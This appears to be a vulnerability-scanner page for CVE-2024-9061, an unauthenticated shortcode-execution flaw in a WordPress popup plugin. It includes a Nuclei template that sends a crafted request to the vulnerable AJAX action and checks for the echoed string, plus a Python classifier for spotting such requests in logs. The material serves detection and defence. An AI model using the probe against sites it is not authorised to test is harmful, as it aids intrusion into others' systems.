WP Popup Builder Popup Forms and Marketing Lead Generation <= 1.3.5 - Arbitrary Shortcode Execution
ID: CVE-2024-9061
Severity: high
Author: s4e-io
Tags: cve,cve2024,wp,wordpress,wp-plugin,wp-popup-builder,shortcode
Description
The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
YAML Source
id: CVE-2024-9061

info:
  name: WP Popup Builder Popup Forms and Marketing Lead Generation <= 1.3.5 - Arbitrary Shortcode Execution
  author: s4e-io
  severity: high
  description: |
    The The WP Popup Builder Popup Forms and Marketing Lead Generation plugin for WordPress is vulnerable to arbitrary shortcode execution via the wp_ajax_nopriv_shortcode_Api_Add AJAX action in all versions up to, and including, 1.3.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9061
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0cac1dc0-87dc-43eb-9db1-638a91200b43?source=cve
    - https://github.com/RandomRobbieBF/CVE-2024-9061
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-9061
    cwe-id: CWE-94
    epss-score: 0.00046
    epss-percentile: 0.18015
  metadata:
    max-request: 2
    verified: true
    vendor: themehunk
    product: wp-popup-builder
    framework: wordpress
    fofa-query: body="/wp-content/plugins/wp-popup-builder/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,wp-popup-builder,shortcode

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/wp-popup-builder")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=shortcode_Api_Add&shortcode=%43%56%45%2d%32%30%32%34%2d%39%30%36%31

    matchers:
      - type: dsl
        dsl:
          - 'len(body) == 13'
          - 'contains(body, "CVE-2024-9061")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a004830460221008e43701d88fd6a8ca3b08043d5139124c06b549a07bacbe082bcdc5c72e38033022100e51c38e4a095bce14b145a68cbddd1855072c1fb943ba2d5d081f583cbaa310f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-9061.yaml"
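
For the defender's side of the template's second request, the following added example (not part of the original template or the plugin) classifies logged POST bodies that hit the shortcode_Api_Add action, separating the template's plain-text echo probe from requests that carry real shortcode tag syntax. The record layout, the `example_tag` placeholder and the function names are assumptions, and it presumes a WAF or proxy that logs request bodies.

```python
import re
from urllib.parse import parse_qs

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "shortcode_Api_Add"  # AJAX action named in the template
# WordPress shortcode syntax: [tag], [tag attr="x"], [/tag]
SHORTCODE_TAG = re.compile(r"\[/?[A-Za-z_][\w-]*(\s[^\]]*)?/?\]")

# Constructed sample records (method, path, form body); not real traffic.
SAMPLE_REQUESTS = [
    ("POST", AJAX_PATH,
     "action=shortcode_Api_Add&shortcode=%43%56%45%2d%32%30%32%34%2d%39%30%36%31"),
    ("POST", AJAX_PATH,
     "action=shortcode_Api_Add&shortcode=%5Bexample_tag+id%3D%221%22%5D"),
    ("POST", AJAX_PATH, "action=heartbeat&interval=15"),
    ("POST", "/wp-login.php", "log=admin&pwd=x"),
]

def classify(method, path, body):
    """Return (verdict, decoded shortcode value) for one logged request.

    verdict is None (unrelated), "probe" (plain text that do_shortcode
    returns unchanged, which the template expects echoed back) or
    "shortcode" (the value contains real tag syntax).
    """
    if method != "POST" or path.split("?", 1)[0] != AJAX_PATH:
        return None, ""
    params = parse_qs(body, keep_blank_values=True)  # also percent-decodes
    if ACTION not in params.get("action", []):
        return None, ""
    value = " ".join(params.get("shortcode", []))
    verdict = "shortcode" if SHORTCODE_TAG.search(value) else "probe"
    return verdict, value

def scan(requests):
    """Classify every record and keep only hits on the vulnerable action."""
    results = [classify(*r) for r in requests]
    return [r for r in results if r[0] is not None]

if __name__ == "__main__":
    for verdict, value in scan(SAMPLE_REQUESTS):
        print(f"{verdict:9} len={len(value):2} value={value!r}")
```

The first sample decodes to the 13-character string the template's `len(body) == 13` matcher relies on; on a site still running 1.3.5 or earlier, any hit on this action from an unauthenticated client is worth reviewing.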